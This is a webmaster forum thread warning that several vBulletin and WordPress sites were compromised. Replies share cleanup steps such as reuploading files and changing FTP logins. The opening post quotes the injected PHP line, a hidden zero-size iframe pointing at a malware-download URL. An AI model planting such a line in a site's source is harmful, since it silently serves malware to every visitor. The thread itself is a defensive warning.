Sites are being Compromised with Malware! (tollukk88.com)

[kiran_n444]

Ok, So I've noticed a problem with 3 of my sites and a few other sites of friends of mine and what not, but within the past week they've all had malicious codes injected into their sources which forces users to download Malicious software from tollukk88.com. Now I've got no idea how it works, but all I know is that it used an iFrame to link to the site and it downloads the malicious software which is then installed and it completely fucks your system.

Last week on the 19th I had to reformat due to the virus completely fucking up my Boot Record and leaving it irreparable as I couldn't even Recovery Mode didn't fix it.

Here's what I know so Far:

In vBulletin it uses the following code in /includes/AdminFunctions.php

echo "\n <iframe src="http://tollukk88.com/888/index.php" width="0" height="0"></iframe></body>\n</html>";

I've also found the iFrame on many other files in my vB installation. Please not that it's not only targetting vB sites as one of my Wordpress sites have been compromised as well. Please not that all the sites that were infected were on completely different servers.

As A Heads Up, There Can Be iFrames to Multpiple Domains so be Thorough!

I'm still trying to figure out whats going on, and this is just a warning to you guys to be careful.

For all the Trolls, I check my permissions, they were all 644 or 755 depending on the file and script.

Google Chrome Blocks the compromised sites (now).

Edit: To Resolve The Issues

this type of attack was faced by me too ,this is 100% issue because of users with infected computers accessing sites by ftp,and this keeps on spreading on server with infected sites. here are some tips i followed :-

1. reupload all files on site
2. disable any cache system if used by infected site
3. search servers for possible hacks
4. change all ftp / cpanel logins
5. enable suexec on server
6. chmod source files like templates to read only by root
7. ask users to scan their pc with good antivirus like KIS
above said can only stop spread future infections.

Information Provided by bhanuprasad1981

Edit: I resolved my issues by parsing through the codes on my site using Notepad++ to search for strings in all my files and replacing them.

Sincerely,
kiran_n444

 

[Whoo]

Where are you hosted and on what, might just been your server thats compromized?

 

[kiran_n444]

They're on Different Servers, I did mention that.
http://www.swnetwork.info (WrzHost NetDirekt) -- Infected with Tullukk -- My Site
http://www.social-warez.com (BioHost Ecatel) -- Infected with Tullukk -- My Site
http://www.maplekillers.com (WrzHost NetDirekt) -- Infected with Tullukk -- Friend's Site, now Cleaned and moves to ServeDome)
http://www.muzik-zone.net/ (Nile.com.pt Visual Fushion) -- Infected with nuttypiano -- Friend's Site

 

[Exel]

His own site is infected lol

 

[ShareShiz]

nulled version on vB :P

 

[kiran_n444]

2 of my sites are infected and a bunch more of other sites (not mine). Also, I just made this post as a heads up to the other webmasters..

 

[bhanuprasad1981]

this type of attack was faced by me too ,this is 100% issue because of users with infected computers accessing sites by ftp,and this keeps on spreading on server with infected sites. here are some tips i followed :-

1. reupload all files on site
2. disable any cache system if used by infected site
3. search servers for possible hacks
4. change all ftp / cpanel logins
5. enable suexec on server
6. chmod source files like templates to read only by root
7. ask users to scan their pc with good antivirus like KIS
above said can only stop spread future infections.

 

[kiran_n444]

Thanks For the info bhanuprasad1981. I cleaned all my files out manually by parsing through the code. Also, I added your information to the main post.

-kiran_n444